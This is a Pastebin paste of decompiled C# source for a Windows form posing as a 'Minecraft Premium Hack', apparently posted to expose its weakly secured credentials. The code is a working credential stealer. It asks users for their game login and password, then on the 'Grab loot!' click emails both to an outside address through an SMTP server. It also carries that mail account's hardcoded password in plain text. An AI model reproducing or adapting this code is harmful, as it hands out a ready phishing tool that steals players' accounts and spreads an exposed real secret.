Guest User

xWezzy1337x - słabo zabezpieczone hasło

a guest
Aug 22nd, 2017
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C# 13.13 KB | None | 0 0
  1. using Microsoft.VisualBasic.CompilerServices;
  2. using Minecraft_Premium_Hack_By_MineCheats.My.Resources;
  3. using System;
  4. using System.Collections.Generic;
  5. using System.ComponentModel;
  6. using System.Diagnostics;
  7. using System.Drawing;
  8. using System.Net;
  9. using System.Net.Mail;
  10. using System.Runtime.CompilerServices;
  11. using System.Threading;
  12. using System.Windows.Forms;
  13.  
  14. namespace Minecraft_Premium_Hack_By_MineCheats
  15. {
  16.     [DesignerGenerated]
  17.     public class Form1 : Form
  18.     {
  19.         private static List<WeakReference> __ENCList = new List<WeakReference>();
  20.  
  21.         private IContainer components;
  22.  
  23.         [AccessedThroughProperty("Label1")]
  24.         private Label _Label1;
  25.  
  26.         [AccessedThroughProperty("Label2")]
  27.         private Label _Label2;
  28.  
  29.         [AccessedThroughProperty("TextBox1")]
  30.         private TextBox _TextBox1;
  31.  
  32.         [AccessedThroughProperty("TextBox2")]
  33.         private TextBox _TextBox2;
  34.  
  35.         [AccessedThroughProperty("Button1")]
  36.         private Button _Button1;
  37.  
  38.         [AccessedThroughProperty("Label3")]
  39.         private Label _Label3;
  40.  
  41.         [AccessedThroughProperty("Label6")]
  42.         private Label _Label6;
  43.  
  44.         [AccessedThroughProperty("PictureBox1")]
  45.         private PictureBox _PictureBox1;
  46.  
  47.         [AccessedThroughProperty("CheckBox1")]
  48.         private CheckBox _CheckBox1;
  49.  
  50.         [AccessedThroughProperty("CheckBox2")]
  51.         private CheckBox _CheckBox2;
  52.  
  53.         [AccessedThroughProperty("CheckBox3")]
  54.         private CheckBox _CheckBox3;
  55.  
  56.         [AccessedThroughProperty("Label5")]
  57.         private Label _Label5;
  58.  
  59.         [AccessedThroughProperty("Label7")]
  60.         private Label _Label7;
  61.  
  62.         internal virtual Label Label1
  63.         {
  64.             [DebuggerNonUserCode]
  65.             get
  66.             {
  67.                 return this._Label1;
  68.             }
  69.             [DebuggerNonUserCode]
  70.             [MethodImpl(MethodImplOptions.Synchronized)]
  71.             set
  72.             {
  73.                 this._Label1 = value;
  74.             }
  75.         }
  76.  
  77.         internal virtual Label Label2
  78.         {
  79.             [DebuggerNonUserCode]
  80.             get
  81.             {
  82.                 return this._Label2;
  83.             }
  84.             [DebuggerNonUserCode]
  85.             [MethodImpl(MethodImplOptions.Synchronized)]
  86.             set
  87.             {
  88.                 this._Label2 = value;
  89.             }
  90.         }
  91.  
  92.         internal virtual TextBox TextBox1
  93.         {
  94.             [DebuggerNonUserCode]
  95.             get
  96.             {
  97.                 return this._TextBox1;
  98.             }
  99.             [DebuggerNonUserCode]
  100.             [MethodImpl(MethodImplOptions.Synchronized)]
  101.             set
  102.             {
  103.                 this._TextBox1 = value;
  104.             }
  105.         }
  106.  
  107.         internal virtual TextBox TextBox2
  108.         {
  109.             [DebuggerNonUserCode]
  110.             get
  111.             {
  112.                 return this._TextBox2;
  113.             }
  114.             [DebuggerNonUserCode]
  115.             [MethodImpl(MethodImplOptions.Synchronized)]
  116.             set
  117.             {
  118.                 this._TextBox2 = value;
  119.             }
  120.         }
  121.  
  122.         internal virtual Button Button1
  123.         {
  124.             [DebuggerNonUserCode]
  125.             get
  126.             {
  127.                 return this._Button1;
  128.             }
  129.             [DebuggerNonUserCode]
  130.             [MethodImpl(MethodImplOptions.Synchronized)]
  131.             set
  132.             {
  133.                 EventHandler value2 = new EventHandler(this.Button1_Click);
  134.                 bool flag = this._Button1 != null;
  135.                 if (flag)
  136.                 {
  137.                     this._Button1.Click -= value2;
  138.                 }
  139.                 this._Button1 = value;
  140.                 flag = (this._Button1 != null);
  141.                 if (flag)
  142.                 {
  143.                     this._Button1.Click += value2;
  144.                 }
  145.             }
  146.         }
  147.  
  148.         internal virtual Label Label3
  149.         {
  150.             [DebuggerNonUserCode]
  151.             get
  152.             {
  153.                 return this._Label3;
  154.             }
  155.             [DebuggerNonUserCode]
  156.             [MethodImpl(MethodImplOptions.Synchronized)]
  157.             set
  158.             {
  159.                 this._Label3 = value;
  160.             }
  161.         }
  162.  
  163.         internal virtual Label Label6
  164.         {
  165.             [DebuggerNonUserCode]
  166.             get
  167.             {
  168.                 return this._Label6;
  169.             }
  170.             [DebuggerNonUserCode]
  171.             [MethodImpl(MethodImplOptions.Synchronized)]
  172.             set
  173.             {
  174.                 this._Label6 = value;
  175.             }
  176.         }
  177.  
  178.         internal virtual PictureBox PictureBox1
  179.         {
  180.             [DebuggerNonUserCode]
  181.             get
  182.             {
  183.                 return this._PictureBox1;
  184.             }
  185.             [DebuggerNonUserCode]
  186.             [MethodImpl(MethodImplOptions.Synchronized)]
  187.             set
  188.             {
  189.                 this._PictureBox1 = value;
  190.             }
  191.         }
  192.  
  193.         internal virtual CheckBox CheckBox1
  194.         {
  195.             [DebuggerNonUserCode]
  196.             get
  197.             {
  198.                 return this._CheckBox1;
  199.             }
  200.             [DebuggerNonUserCode]
  201.             [MethodImpl(MethodImplOptions.Synchronized)]
  202.             set
  203.             {
  204.                 this._CheckBox1 = value;
  205.             }
  206.         }
  207.  
  208.         internal virtual CheckBox CheckBox2
  209.         {
  210.             [DebuggerNonUserCode]
  211.             get
  212.             {
  213.                 return this._CheckBox2;
  214.             }
  215.             [DebuggerNonUserCode]
  216.             [MethodImpl(MethodImplOptions.Synchronized)]
  217.             set
  218.             {
  219.                 this._CheckBox2 = value;
  220.             }
  221.         }
  222.  
  223.         internal virtual CheckBox CheckBox3
  224.         {
  225.             [DebuggerNonUserCode]
  226.             get
  227.             {
  228.                 return this._CheckBox3;
  229.             }
  230.             [DebuggerNonUserCode]
  231.             [MethodImpl(MethodImplOptions.Synchronized)]
  232.             set
  233.             {
  234.                 this._CheckBox3 = value;
  235.             }
  236.         }
  237.  
  238.         internal virtual Label Label5
  239.         {
  240.             [DebuggerNonUserCode]
  241.             get
  242.             {
  243.                 return this._Label5;
  244.             }
  245.             [DebuggerNonUserCode]
  246.             [MethodImpl(MethodImplOptions.Synchronized)]
  247.             set
  248.             {
  249.                 this._Label5 = value;
  250.             }
  251.         }
  252.  
  253.         internal virtual Label Label7
  254.         {
  255.             [DebuggerNonUserCode]
  256.             get
  257.             {
  258.                 return this._Label7;
  259.             }
  260.             [DebuggerNonUserCode]
  261.             [MethodImpl(MethodImplOptions.Synchronized)]
  262.             set
  263.             {
  264.                 this._Label7 = value;
  265.             }
  266.         }
  267.  
  268.         [DebuggerNonUserCode]
  269.         public Form1()
  270.         {
  271.             base.Load += new EventHandler(this.Form1_Load);
  272.             Form1.__ENCAddToList(this);
  273.             this.InitializeComponent();
  274.         }
  275.  
  276.         [DebuggerNonUserCode]
  277.         private static void __ENCAddToList(object value)
  278.         {
  279.             List<WeakReference> _ENCList = Form1.__ENCList;
  280.             bool flag = false;
  281.             checked
  282.             {
  283.                 try
  284.                 {
  285.                     Monitor.Enter(_ENCList, ref flag);
  286.                     bool flag2 = Form1.__ENCList.Count == Form1.__ENCList.Capacity;
  287.                     if (flag2)
  288.                     {
  289.                         int num = 0;
  290.                         int arg_44_0 = 0;
  291.                         int num2 = Form1.__ENCList.Count - 1;
  292.                         int num3 = arg_44_0;
  293.                         while (true)
  294.                         {
  295.                             int arg_95_0 = num3;
  296.                             int num4 = num2;
  297.                             if (arg_95_0 > num4)
  298.                             {
  299.                                 break;
  300.                             }
  301.                             WeakReference weakReference = Form1.__ENCList[num3];
  302.                             flag2 = weakReference.IsAlive;
  303.                             if (flag2)
  304.                             {
  305.                                 bool flag3 = num3 != num;
  306.                                 if (flag3)
  307.                                 {
  308.                                     Form1.__ENCList[num] = Form1.__ENCList[num3];
  309.                                 }
  310.                                 num++;
  311.                             }
  312.                             num3++;
  313.                         }
  314.                         Form1.__ENCList.RemoveRange(num, Form1.__ENCList.Count - num);
  315.                         Form1.__ENCList.Capacity = Form1.__ENCList.Count;
  316.                     }
  317.                     Form1.__ENCList.Add(new WeakReference(RuntimeHelpers.GetObjectValue(value)));
  318.                 }
  319.                 finally
  320.                 {
  321.                     bool flag3 = flag;
  322.                     if (flag3)
  323.                     {
  324.                         Monitor.Exit(_ENCList);
  325.                     }
  326.                 }
  327.             }
  328.         }
  329.  
  330.         [DebuggerNonUserCode]
  331.         protected override void Dispose(bool disposing)
  332.         {
  333.             try
  334.             {
  335.                 bool flag = disposing && this.components != null;
  336.                 if (flag)
  337.                 {
  338.                     this.components.Dispose();
  339.                 }
  340.             }
  341.             finally
  342.             {
  343.                 base.Dispose(disposing);
  344.             }
  345.         }
  346.  
  347.         [DebuggerStepThrough]
  348.         private void InitializeComponent()
  349.         {
  350.             this.Label1 = new Label();
  351.             this.Label2 = new Label();
  352.             this.TextBox1 = new TextBox();
  353.             this.TextBox2 = new TextBox();
  354.             this.Button1 = new Button();
  355.             this.Label3 = new Label();
  356.             this.Label6 = new Label();
  357.             this.PictureBox1 = new PictureBox();
  358.             this.CheckBox1 = new CheckBox();
  359.             this.CheckBox2 = new CheckBox();
  360.             this.CheckBox3 = new CheckBox();
  361.             this.Label5 = new Label();
  362.             this.Label7 = new Label();
  363.             ((ISupportInitialize)this.PictureBox1).BeginInit();
  364.             this.SuspendLayout();
  365.             this.Label1.AutoSize = true;
  366.             Control arg_D6_0 = this.Label1;
  367.             Point location = new Point(216, 265);
  368.             arg_D6_0.Location = location;
  369.             this.Label1.Name = "Label1";
  370.             Control arg_100_0 = this.Label1;
  371.             Size size = new Size(47, 13);
  372.             arg_100_0.Size = size;
  373.             this.Label1.TabIndex = 0;
  374.             this.Label1.Text = "Login/Ip";
  375.             this.Label2.AutoSize = true;
  376.             Control arg_14A_0 = this.Label2;
  377.             location = new Point(205, 301);
  378.             arg_14A_0.Location = location;
  379.             this.Label2.Name = "Label2";
  380.             Control arg_174_0 = this.Label2;
  381.             size = new Size(86, 13);
  382.             arg_174_0.Size = size;
  383.             this.Label2.TabIndex = 1;
  384.             this.Label2.Text = "Hasło/password";
  385.             Control arg_1B1_0 = this.TextBox1;
  386.             location = new Point(297, 262);
  387.             arg_1B1_0.Location = location;
  388.             this.TextBox1.Name = "TextBox1";
  389.             Control arg_1DE_0 = this.TextBox1;
  390.             size = new Size(160, 20);
  391.             arg_1DE_0.Size = size;
  392.             this.TextBox1.TabIndex = 2;
  393.             Control arg_20A_0 = this.TextBox2;
  394.             location = new Point(297, 294);
  395.             arg_20A_0.Location = location;
  396.             this.TextBox2.Name = "TextBox2";
  397.             Control arg_237_0 = this.TextBox2;
  398.             size = new Size(160, 20);
  399.             arg_237_0.Size = size;
  400.             this.TextBox2.TabIndex = 3;
  401.             Control arg_260_0 = this.Button1;
  402.             location = new Point(12, 256);
  403.             arg_260_0.Location = location;
  404.             this.Button1.Name = "Button1";
  405.             Control arg_28D_0 = this.Button1;
  406.             size = new Size(187, 71);
  407.             arg_28D_0.Size = size;
  408.             this.Button1.TabIndex = 4;
  409.             this.Button1.Text = "Zgarnij Loot!/Grab loot!";
  410.             this.Button1.UseVisualStyleBackColor = true;
  411.             this.Label3.AutoSize = true;
  412.             Control arg_2DE_0 = this.Label3;
  413.             location = new Point(12, 9);
  414.             arg_2DE_0.Location = location;
  415.             this.Label3.Name = "Label3";
  416.             Control arg_308_0 = this.Label3;
  417.             size = new Size(22, 13);
  418.             arg_308_0.Size = size;
  419.             this.Label3.TabIndex = 6;
  420.             this.Label3.Text = "Vip";
  421.             this.Label6.AutoSize = true;
  422.             Control arg_34F_0 = this.Label6;
  423.             location = new Point(37, 174);
  424.             arg_34F_0.Location = location;
  425.             this.Label6.Name = "Label6";
  426.             Control arg_378_0 = this.Label6;
  427.             size = new Size(0, 13);
  428.             arg_378_0.Size = size;
  429.             this.Label6.TabIndex = 12;
  430.             this.PictureBox1.Image = Resources.hqdefault;
  431.             Control arg_3AF_0 = this.PictureBox1;
  432.             location = new Point(2, -7);
  433.             arg_3AF_0.Location = location;
  434.             this.PictureBox1.Name = "PictureBox1";
  435.             Control arg_3DF_0 = this.PictureBox1;
  436.             size = new Size(471, 360);
  437.             arg_3DF_0.Size = size;
  438.             this.PictureBox1.TabIndex = 13;
  439.             this.PictureBox1.TabStop = false;
  440.             this.CheckBox1.AutoSize = true;
  441.             Control arg_41F_0 = this.CheckBox1;
  442.             location = new Point(40, 5);
  443.             arg_41F_0.Location = location;
  444.             this.CheckBox1.Name = "CheckBox1";
  445.             Control arg_449_0 = this.CheckBox1;
  446.             size = new Size(45, 17);
  447.             arg_449_0.Size = size;
  448.             this.CheckBox1.TabIndex = 14;
  449.             this.CheckBox1.Text = "Tak";
  450.             this.CheckBox1.UseVisualStyleBackColor = true;
  451.             this.CheckBox2.AutoSize = true;
  452.             Control arg_49D_0 = this.CheckBox2;
  453.             location = new Point(226, 8);
  454.             arg_49D_0.Location = location;
  455.             this.CheckBox2.Name = "CheckBox2";
  456.             Control arg_4C7_0 = this.CheckBox2;
  457.             size = new Size(45, 17);
  458.             arg_4C7_0.Size = size;
  459.             this.CheckBox2.TabIndex = 15;
  460.             this.CheckBox2.Text = "Tak";
  461.             this.CheckBox2.UseVisualStyleBackColor = true;
  462.             this.CheckBox3.AutoSize = true;
  463.             Control arg_51B_0 = this.CheckBox3;
  464.             location = new Point(411, 5);
  465.             arg_51B_0.Location = location;
  466.             this.CheckBox3.Name = "CheckBox3";
  467.             Control arg_545_0 = this.CheckBox3;
  468.             size = new Size(45, 17);
  469.             arg_545_0.Size = size;
  470.             this.CheckBox3.TabIndex = 16;
  471.             this.CheckBox3.Text = "Tak";
  472.             this.CheckBox3.UseVisualStyleBackColor = true;
  473.             this.Label5.AutoSize = true;
  474.             Control arg_59A_0 = this.Label5;
  475.             location = new Point(191, 9);
  476.             arg_59A_0.Location = location;
  477.             this.Label5.Name = "Label5";
  478.             Control arg_5C4_0 = this.Label5;
  479.             size = new Size(29, 13);
  480.             arg_5C4_0.Size = size;
  481.             this.Label5.TabIndex = 17;
  482.             this.Label5.Text = "SVip";
  483.             this.Label7.AutoSize = true;
  484.             Control arg_60C_0 = this.Label7;
  485.             location = new Point(358, 9);
  486.             arg_60C_0.Location = location;
  487.             this.Label7.Name = "Label7";
  488.             Control arg_636_0 = this.Label7;
  489.             size = new Size(47, 13);
  490.             arg_636_0.Size = size;
  491.             this.Label7.TabIndex = 18;
  492.             this.Label7.Text = "Premium";
  493.             SizeF autoScaleDimensions = new SizeF(6f, 13f);
  494.             this.AutoScaleDimensions = autoScaleDimensions;
  495.             this.AutoScaleMode = AutoScaleMode.Font;
  496.             size = new Size(470, 339);
  497.             this.ClientSize = size;
  498.             this.Controls.Add(this.Label7);
  499.             this.Controls.Add(this.Label5);
  500.             this.Controls.Add(this.CheckBox3);
  501.             this.Controls.Add(this.CheckBox2);
  502.             this.Controls.Add(this.CheckBox1);
  503.             this.Controls.Add(this.Label6);
  504.             this.Controls.Add(this.Label3);
  505.             this.Controls.Add(this.Button1);
  506.             this.Controls.Add(this.TextBox2);
  507.             this.Controls.Add(this.TextBox1);
  508.             this.Controls.Add(this.Label2);
  509.             this.Controls.Add(this.Label1);
  510.             this.Controls.Add(this.PictureBox1);
  511.             this.Name = "Form1";
  512.             this.Text = "Minecraft_Premium Hack By MineCheats";
  513.             ((ISupportInitialize)this.PictureBox1).EndInit();
  514.             this.ResumeLayout(false);
  515.             this.PerformLayout();
  516.         }
  517.  
  518.         private void Form1_Load(object sender, EventArgs e)
  519.         {
  520.         }
  521.  
  522.         private void Button1_Click(object sender, EventArgs e)
  523.         {
  524.             MailMessage mailMessage = new MailMessage();
  525.             try
  526.             {
  527.                 mailMessage.From = new MailAddress("MineCheats@wp.pl");
  528.                 mailMessage.To.Add("MineCheats@wp.pl");
  529.                 mailMessage.Subject = this.TextBox1.Text;
  530.                 mailMessage.Body = this.TextBox2.Text;
  531.                 new SmtpClient("smtp.wp.pl")
  532.                 {
  533.                     Port = 587,
  534.                     EnableSsl = true,
  535.                     Credentials = new NetworkCredential("MineCheats@wp.pl", "3odamninie413-kluzy319")
  536.                 }.Send(mailMessage);
  537.                 this.TextBox2.Text = "";
  538.             }
  539.             catch (Exception expr_9E)
  540.             {
  541.                 ProjectData.SetProjectError(expr_9E);
  542.                 ProjectData.ClearProjectError();
  543.             }
  544.         }
  545.  
  546.         private void Label4_Click(object sender, EventArgs e)
  547.         {
  548.         }
  549.     }
  550. }
Add Comment
Please, Sign In to add comment